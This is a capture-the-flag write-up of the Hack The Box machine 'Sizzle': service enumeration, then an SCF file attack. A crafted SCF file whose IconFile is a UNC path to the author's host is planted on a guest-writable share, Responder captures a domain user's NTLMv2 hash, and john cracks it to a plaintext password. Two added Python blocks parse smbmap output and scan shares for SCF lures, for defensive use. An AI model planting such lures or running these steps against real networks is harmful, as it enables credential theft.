title: Hack The Box - Sizzle (SCF file phishing) author: World'sEnd layout: true categories: Internal network security tags:
• Box-hacking diary
It takes guts to make change.
Hack The Box - Sizzle:
This machine was genuinely hard for me at this point: much of its behaviour fell into my blind spots, so I had to keep searching for and reading up on related material, and it cost me a lot of time and effort.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 22:51 CST
Stats: 0:04:46 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.88% done; ETC: 22:56 (0:00:15 remaining)
Nmap scan report for 10.10.10.103
Host is up (0.21s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-23T14:58:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2022-04-23T14:58:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2022-04-23T14:58:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2022-04-23T14:58:37+00:00; +1s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2022-04-23T14:58:36+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2022-04-23T14:58:36+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49717/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-04-23T14:58:05
|_ start_date: 2022-04-23T14:49:39
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 425.59 seconds
FTP port:
I can try anonymous access to port 21, since Nmap told me "Anonymous FTP login allowed". Well, it does not work:
$ ftp 10.10.10.103
Connected to 10.10.10.103.
220 Microsoft FTP Service
Name (10.10.10.103:worldisend): worldisend
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
ftp> ls
530 Please login with USER and PASS.
530 Please login with USER and PASS.
ftp: Can't bind for data connection: 地址已在使用
ftp> dir
530 Please login with USER and PASS.
ftp>
DNS port:
I can first pin down the target domain. Although Nmap did not detect the tell-tale port 88 for me, it did enumerate HTB.LOCAL and sizzle.htb.local:
$ dig @10.10.10.103 sizzle.htb.local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.103 sizzle.htb.local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 56747
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 11b28ab1929fa292 (echoed)
;; QUESTION SECTION:
;sizzle.htb.local. IN A
;; ANSWER SECTION:
sizzle.htb.local. 1200 IN A 10.10.10.103
;; Query time: 303 msec
;; SERVER: 10.10.10.103#53(10.10.10.103) (UDP)
;; WHEN: Sat Apr 23 22:55:34 CST 2022
;; MSG SIZE rcvd: 73
$ dig @10.10.10.103 htb,local
; <<>> DiG 9.18.0-2-Debian <<>> @10.10.10.103 htb,local
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 21830
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
; COOKIE: 96e2eeac0b1c8d27 (echoed)
;; QUESTION SECTION:
;htb,local. IN A
;; Query time: 407 msec
;; SERVER: 10.10.10.103#53(10.10.10.103) (UDP)
;; WHEN: Sat Apr 23 22:57:15 CST 2022
;; MSG SIZE rcvd: 5
It looks like the target really does have two domains. I can try requesting a zone transfer; it has never succeeded for me, but I seem to have a compulsion about it:
$ dig axfr @10.10.10.103 htb.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.103 htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
$ dig axfr @10.10.10.103 sizzle.htb.local
; <<>> DiG 9.18.0-2-Debian <<>> axfr @10.10.10.103 sizzle.htb.local
; (1 server found)
;; global options: +cmd
; Transfer failed.
Well, neither of them works.
HTTP port:
Late-night temptation:
An ASP.NET environment, the IIS 10.0 component, a Windows operating system, and no other information beyond that:
Perhaps its domain name is sizzle.htb. I can add it to my hosts file and try again; well, it is still the same page. I can try brute-forcing paths:
$ dirsearch -u http://sizzle.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/worldisend/.dirsearch/reports/sizzle.htb/-_22-04-23_23-05-37.txt
Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-23_23-05-37.log
Target: http://sizzle.htb/
[23:05:38] Starting:
[23:05:42] 403 - 312B - /%2e%2e//google.com
[23:06:23] 403 - 2KB - /Trace.axd
[23:06:26] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[23:07:01] 403 - 1KB - /aspnet_client/
[23:07:01] 301 - 155B - /aspnet_client -> http://sizzle.htb/aspnet_client/
[23:07:15] 403 - 1KB - /certenroll/
[23:07:15] 401 - 1KB - /certsrv/
[23:07:45] 301 - 148B - /images -> http://sizzle.htb/images/
[23:07:45] 403 - 1KB - /images/
[23:07:47] 200 - 60B - /index.html
[23:07:50] 400 - 3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[23:07:50] 400 - 3KB - /jolokia/exec/java.lang:type=Memory/gc
[23:07:50] 400 - 3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[23:07:50] 400 - 3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[23:07:50] 400 - 3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[23:07:50] 400 - 3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
Task Completed
/certenroll looks interesting, but unfortunately it is a 403.
Maybe I can try brute-forcing against the IP as well:
$ dirsearch -u http://10.10.10.103
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/worldisend/.dirsearch/reports/10.10.10.103/_22-04-23_23-13-27.txt
Error Log: /home/worldisend/.dirsearch/logs/errors-22-04-23_23-13-27.log
Target: http://10.10.10.103/
[23:13:28] Starting:
[23:13:31] 403 - 312B - /%2e%2e//google.com
[23:13:54] 403 - 2KB - /Trace.axd
[23:13:57] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[23:14:29] 403 - 1KB - /aspnet_client/
[23:14:29] 301 - 157B - /aspnet_client -> http://10.10.10.103/aspnet_client/
[23:14:34] 401 - 1KB - /certsrv/
[23:14:34] 403 - 1KB - /certenroll/
[23:14:51] 301 - 150B - /images -> http://10.10.10.103/images/
[23:14:51] 403 - 1KB - /images/
[23:14:52] 200 - 60B - /index.html
/certsrv/ is also interesting. When I try to open it, it asks me for credentials:
This directory is used by the Certificate Enrollment Web Services of a Windows Certificate Authority. Clients use it to request certificates, which applications can then use to authenticate to servers instead of, or in addition to, password authentication. For now I have no user credentials, so I will keep it in mind; perhaps I will use it later.
RPC port:
Maybe I can check whether RPC allows anonymous access:
$ rpcclient -U "" -N 10.10.10.103
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
Not allowed either.
LDAP port:
$ sudo nmap -sT -Pn -n --open 10.10.10.103 -p389 --script ldap-rootdse
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 23:47 CST
Nmap scan report for 10.10.10.103
Host is up (0.19s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20220423154708.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
| dsServiceName: CN=NTDS Settings,CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
| namingContexts: DC=HTB,DC=LOCAL
| namingContexts: CN=Configuration,DC=HTB,DC=LOCAL
| namingContexts: CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
| namingContexts: DC=DomainDnsZones,DC=HTB,DC=LOCAL
| namingContexts: DC=ForestDnsZones,DC=HTB,DC=LOCAL
| defaultNamingContext: DC=HTB,DC=LOCAL
| schemaNamingContext: CN=Schema,CN=Configuration,DC=HTB,DC=LOCAL
| configurationNamingContext: CN=Configuration,DC=HTB,DC=LOCAL
| rootDomainNamingContext: DC=HTB,DC=LOCAL
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| highestCommittedUSN: 143469
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| dnsHostName: sizzle.HTB.LOCAL
| ldapServiceName: HTB.LOCAL:sizzle$@HTB.LOCAL
| serverName: CN=SIZZLE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=HTB,DC=LOCAL
| isSynchronized: TRUE
| isGlobalCatalogReady: TRUE
| domainFunctionality: 7
| forestFunctionality: 7
|_ domainControllerFunctionality: 7
Service Info: Host: SIZZLE; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.86 seconds
No further information.
HTTPS port:
Same as HTTP. No further information.
SMB port:
Maybe I can try accessing the SMB shares. If smbmap is not given a username, access is denied, but if I supply an arbitrary non-existent username, the share information comes back normally:
$ smbmap -H 10.10.10.103 -u whoami
[+] Guest session IP: 10.10.10.103:445 Name: sizzle.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share
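The guest-session behaviour above (no username denied, a bogus username granted a guest session) is the kind of exposure an assessment report should capture precisely. The following is an added example for this write-up, not code from the original post or from smbmap: a small parser for smbmap's share table that lists what a guest session can reach and, given a second listing taken with credentials, which shares those credentials additionally unlock. The two listings are constructed to mirror the whitespace-flattened tables shown on this page.

```python
"""Parse smbmap share listings and report what an unauthenticated (guest) session can
reach, and what a set of credentials additionally unlocks.

Added example for this write-up, not from the original post or from smbmap. The two
listings are constructed to mirror the whitespace-flattened tables shown above.
"""
import re
from typing import Dict, List, Tuple

GUEST_LISTING = """\
[+] Guest session IP: 10.10.10.103:445 Name: sizzle.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share
"""

AUTH_LISTING = """\
[+] IP: 10.10.10.103:445 Name: sizzle.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
"""

# smbmap's permission strings; longer ones first so the alternation prefers them.
PERMS = ("READ, WRITE", "WRITE ONLY", "READ ONLY", "NO ACCESS")
# Share names may contain spaces ("Department Shares"), so the share column is
# matched non-greedily up to the first permission string.
ROW_RE = re.compile(
    r"^(?P<share>.+?)\s+(?P<perm>" + "|".join(re.escape(p) for p in PERMS)
    + r")(?:\s+(?P<comment>.*))?$")
SESSION_RE = re.compile(
    r"^\[\+\]\s+(?P<kind>Guest session IP|IP):\s*(?P<ip>[\d.]+):(?P<port>\d+)"
    r"\s+Name:\s*(?P<name>\S+)")


def parse_smbmap(text: str) -> Tuple[Dict[str, object], List[Dict[str, str]]]:
    """Return (session info, share rows) for one smbmap listing."""
    session: Dict[str, object] = {}
    shares: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = SESSION_RE.match(line)
        if m:
            session = {"guest": m.group("kind").startswith("Guest"),
                       "ip": m.group("ip"), "name": m.group("name")}
            continue
        m = ROW_RE.match(line)
        if m:  # header and separator lines carry no permission string and are skipped
            shares.append({"share": m.group("share"), "perm": m.group("perm"),
                           "comment": m.group("comment") or ""})
    return session, shares


def accessible(shares: List[Dict[str, str]]) -> List[str]:
    """Names of shares with any permission other than NO ACCESS, in listing order."""
    return [s["share"] for s in shares if s["perm"] != "NO ACCESS"]


def guest_exposure(text: str) -> List[str]:
    """Shares reachable without credentials; empty when the listing was authenticated."""
    session, shares = parse_smbmap(text)
    return accessible(shares) if session.get("guest") else []


def newly_unlocked(guest_text: str, auth_text: str) -> List[str]:
    """Shares that the credentialed session can reach but the guest session cannot."""
    _, guest_shares = parse_smbmap(guest_text)
    _, auth_shares = parse_smbmap(auth_text)
    return sorted(set(accessible(auth_shares)) - set(accessible(guest_shares)))


if __name__ == "__main__":
    print("guest can reach:", guest_exposure(GUEST_LISTING))
    print("credentials unlock:", newly_unlocked(GUEST_LISTING, AUTH_LISTING))
```

Any entry in the guest list is a finding on its own: a share that a bogus username can read is readable by anyone on the network, and if it is also writable it is exactly the precondition the SCF lure below relies on.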
The comment after the CertEnroll share is odd: it looks related to the login on the web port. But I have no read permission on it.
Active Directory Certificate Services share
Although IPC$ shows as readable, I have no permission to list it:
$ smbclient -N //10.10.10.103/IPC$ -U whoami
Try "help" to get a list of possible commands.
smb: \> DIR
NT_STATUS_INVALID_INFO_CLASS listing \*
Department Shares contains quite a few directories:
$ smbclient -N //10.10.10.103/"Department Shares" -U whoami
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 3 23:22:32 2018
.. D 0 Tue Jul 3 23:22:32 2018
Accounting D 0 Tue Jul 3 03:21:43 2018
Audit D 0 Tue Jul 3 03:14:28 2018
Banking D 0 Tue Jul 3 23:22:39 2018
CEO_protected D 0 Tue Jul 3 03:15:01 2018
Devops D 0 Tue Jul 3 03:19:33 2018
Finance D 0 Tue Jul 3 03:11:57 2018
HR D 0 Tue Jul 3 03:16:11 2018
Infosec D 0 Tue Jul 3 03:14:24 2018
Infrastructure D 0 Tue Jul 3 03:13:59 2018
IT D 0 Tue Jul 3 03:12:04 2018
Legal D 0 Tue Jul 3 03:12:09 2018
M&A D 0 Tue Jul 3 03:15:25 2018
Marketing D 0 Tue Jul 3 03:14:43 2018
R&D D 0 Tue Jul 3 03:11:47 2018
Sales D 0 Tue Jul 3 03:14:37 2018
Security D 0 Tue Jul 3 03:21:47 2018
Tax D 0 Tue Jul 3 03:16:54 2018
Users D 0 Wed Jul 11 05:39:32 2018
ZZ_ARCHIVE D 0 Tue Jul 3 03:32:58 2018
7779839 blocks of size 4096. 3321018 blocks available
But only two of them are useful to me, ZZ_ARCHIVE and Users. The other directories also contain subdirectories, but descending level by level they are all empty. The pile of files in ZZ_ARCHIVE are all fakes as well.
smb: \ZZ_ARCHIVE\> ls
. D 0 Tue Jul 3 03:32:58 2018
.. D 0 Tue Jul 3 03:32:58 2018
AddComplete.pptx A 419430 Tue Jul 3 03:32:58 2018
AddMerge.ram A 419430 Tue Jul 3 03:32:57 2018
ConfirmUnprotect.doc A 419430 Tue Jul 3 03:32:57 2018
ConvertFromInvoke.mov A 419430 Tue Jul 3 03:32:57 2018
ConvertJoin.docx A 419430 Tue Jul 3 03:32:57 2018
CopyPublish.ogg A 419430 Tue Jul 3 03:32:57 2018
DebugMove.mpg A 419430 Tue Jul 3 03:32:57 2018
In the Users directory I can pick up some usernames, even though the directories are all empty:
smb: \> cd Users\
smb: \Users\> ls
. D 0 Wed Jul 11 05:39:32 2018
.. D 0 Wed Jul 11 05:39:32 2018
amanda D 0 Tue Jul 3 03:18:43 2018
amanda_adm D 0 Tue Jul 3 03:19:06 2018
bill D 0 Tue Jul 3 03:18:28 2018
bob D 0 Tue Jul 3 03:18:31 2018
chris D 0 Tue Jul 3 03:19:14 2018
henry D 0 Tue Jul 3 03:18:39 2018
joe D 0 Tue Jul 3 03:18:34 2018
jose D 0 Tue Jul 3 03:18:53 2018
lkys37en D 0 Wed Jul 11 05:39:04 2018
morgan D 0 Tue Jul 3 03:18:48 2018
mrb3n D 0 Tue Jul 3 03:19:20 2018
Public D 0 Wed Sep 26 13:45:32 2018
SCF file attack:
I saw an SCF File Attack tag on the machine and went looking for more material. I found this article, which explains well how to carry out an SCF file attack via an SMB share:
https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
Quoting a passage from its author:
SMB is a protocol that is widely used across organizations for file sharing purposes. It is not unusual for internal penetration tests to discover file shares that contain sensitive information such as plain-text passwords and database connection strings. However, even if a file share does not contain any data that could be used to connect to other systems, if it is configured with write permission for unauthenticated users it is still possible to obtain the password hash of a domain user or a Meterpreter shell. It is nothing new that SCF (Shell Command File) files can be used to perform a limited set of operations, such as showing the Windows desktop or opening Windows Explorer. However, an SCF file can be used to access a specific UNC path, which allows the penetration tester to build an attack.
Saving a file containing the UNC link as an SCF file and adding an @ symbol in front of the filename will place the SCF file at the top of the share drive. When a user browses the share, a connection from his system to the UNC path contained in the SCF file is established automatically. Windows will attempt to authenticate to that share with the user's username and password. During that authentication process, a random 8-byte challenge key is sent from the server to the client, and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture the NTLMv2 hash.
This looks like a phishing attack. First I need to confirm that I have write permission on the target SMB share:
smb: \Users\Public\> put user.txt
putting file user.txt as \Users\Public\user.txt (0.1 kb/s) (average 0.1 kb/s)
smb: \Users\Public\> ls
. D 0 Sun Apr 24 00:17:47 2022
.. D 0 Sun Apr 24 00:17:47 2022
user.txt A 70 Sun Apr 24 00:17:48 2022
7779839 blocks of size 4096. 3594965 blocks available
smb: \Users\Public\>
It looks like I do, so I can try constructing a malicious SCF file and putting it into the SMB share:
[Shell]
Command=2
IconFile=\\10.10.16.12\share\whoami.ico
[Taskbar]
Command=ToggleDesktop
smb: \Users\Public\> put @whoami.scf
putting file @whoami.scf as \Users\Public\@whoami.scf (0.1 kb/s) (average 0.1 kb/s)
smb: \Users\Public\> ls
. D 0 Sun Apr 24 00:23:16 2022
.. D 0 Sun Apr 24 00:23:16 2022
@whoami.scf A 90 Sun Apr 24 00:23:17 2022
7779839 blocks of size 4096. 3594901 blocks available
smb: \Users\Public\>
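From the defender's side, the lure planted above is easy to spot on disk: an .scf file whose IconFile is a UNC path to a host that is not one of the organization's file servers, often with a name starting with "@". The following is an added example for this write-up, not code from the original post or from pentestlab.blog: a scanner that walks a directory tree (for instance a share mounted for review) and reports such files. The sample files are constructed, and TRUSTED_UNC_HOSTS is an assumed stand-in for a real file-server inventory.

```python
"""Scan a directory tree (for example a share mounted for review) for SCF files whose
IconFile points at a UNC path: the lure pattern described above.

Added example for this write-up, not code from the original post or from
pentestlab.blog. The sample files are constructed, and TRUSTED_UNC_HOSTS is an
assumed stand-in for an organization's real file-server inventory.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Assumed allow-list of hosts that legitimately serve icons over UNC on this network.
TRUSTED_UNC_HOSTS = {"fileserver01", "fileserver01.htb.local"}

# Captures the host part of a UNC path such as \\10.10.16.12\share\whoami.ico
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Constructed samples: the lure from this write-up, a benign local-icon SCF, and
# an SCF pointing at a trusted internal server.
LURE_SAMPLE = (
    "[Shell]\nCommand=2\nIconFile=\\\\10.10.16.12\\share\\whoami.ico\n"
    "[Taskbar]\nCommand=ToggleDesktop\n"
)
BENIGN_SAMPLE = (
    "[Shell]\nCommand=2\nIconFile=C:\\Windows\\explorer.exe,3\n"
    "[Taskbar]\nCommand=ToggleDesktop\n"
)
TRUSTED_SAMPLE = (
    "[Shell]\nCommand=2\nIconFile=\\\\fileserver01\\icons\\corp.ico\n"
    "[Taskbar]\nCommand=ToggleDesktop\n"
)


@dataclass
class ScfFinding:
    path: str
    unc_host: str
    reasons: List[str] = field(default_factory=list)


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI-style parser: {section (lower-case): {key (lower-case): value}}."""
    sections: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def assess_scf(path: str, text: str) -> Optional[ScfFinding]:
    """Return a finding when the SCF would make Explorer reach out to an untrusted host."""
    icon = parse_scf(text).get("shell", {}).get("iconfile", "")
    m = UNC_RE.match(icon)
    if not m:
        return None  # local icon path: no outbound SMB connection is triggered
    host = m.group(1)
    finding = ScfFinding(path=path, unc_host=host)
    if host.lower() not in TRUSTED_UNC_HOSTS:
        finding.reasons.append(f"IconFile resolves to untrusted host {host}")
    if os.path.basename(path).startswith("@"):
        finding.reasons.append("filename starts with '@' so it sorts to the top of the listing")
    return finding if finding.reasons else None


def scan_share(root: str) -> List[ScfFinding]:
    """Walk a directory tree and collect findings for every .scf file in it."""
    findings: List[ScfFinding] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".scf"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                finding = assess_scf(full, fh.read())
            if finding:
                findings.append(finding)
    return findings


def demo() -> List[ScfFinding]:
    """Write the constructed samples into a temporary 'share' and scan it."""
    root = tempfile.mkdtemp(prefix="scf-scan-")
    public = os.path.join(root, "Users", "Public")
    os.makedirs(public)
    for name, body in (("@whoami.scf", LURE_SAMPLE), ("readme.scf", BENIGN_SAMPLE),
                       ("corp.scf", TRUSTED_SAMPLE)):
        with open(os.path.join(public, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return scan_share(root)


if __name__ == "__main__":
    for f in demo():
        print(f.path, f.unc_host, "; ".join(f.reasons))
```

Scanning only finds lures after the fact; the root cause on this box is a share writable by a guest session, and the outbound SMB connection the lure triggers is what egress filtering on TCP 445 and SMB signing requirements are meant to contain.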
The whoami.ico does not need to exist, and my share does not even need to be running, because all I need is to capture the request the target sends to me after it touches my SCF file; whether it can actually fetch the icon does not matter. I can capture the target's request with Responder. Before capturing, check which interface to listen on; in my case it is tun0:
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.16.12 netmask 255.255.254.0 destination 10.10.16.12
inet6 dead:beef:4::100a prefixlen 64 scopeid 0x0
inet6 fe80::29e2:dde4:349f:ba4b prefixlen 64 scopeid 0x20
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 57004 bytes 42200602 (40.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 195260 bytes 15547373 (14.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Then start Responder, which needs sudo:
$ sudo responder -I tun0
[sudo] worldisend 的密码:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.1.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
It loads a pile of configuration and starts listening; after a while, the fish takes the bait:
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.12]
Responder IPv6 [dead:beef:4::100a]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-AKXSZ1UMGHV]
Responder Domain Name [L4AA.LOCAL]
Responder DCE-RPC Port [47287]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : ::ffff:10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:ff4d4e05045d788a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
[*] Skipping previously captured hash for HTB\amanda
This is an NTLMv2 hash, which I cannot use for pass-the-hash lateral movement, but I can brute-force it and perhaps recover the plaintext password of the amanda account:
$ john -w=/usr/share/wordlists/rockyou.txt --fork=4 ./hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
2 1g 0:00:00:04 DONE (2022-04-24 00:35) 0.2159g/s 616397p/s 616397c/s 616397C/s Asheville..Ashakiran
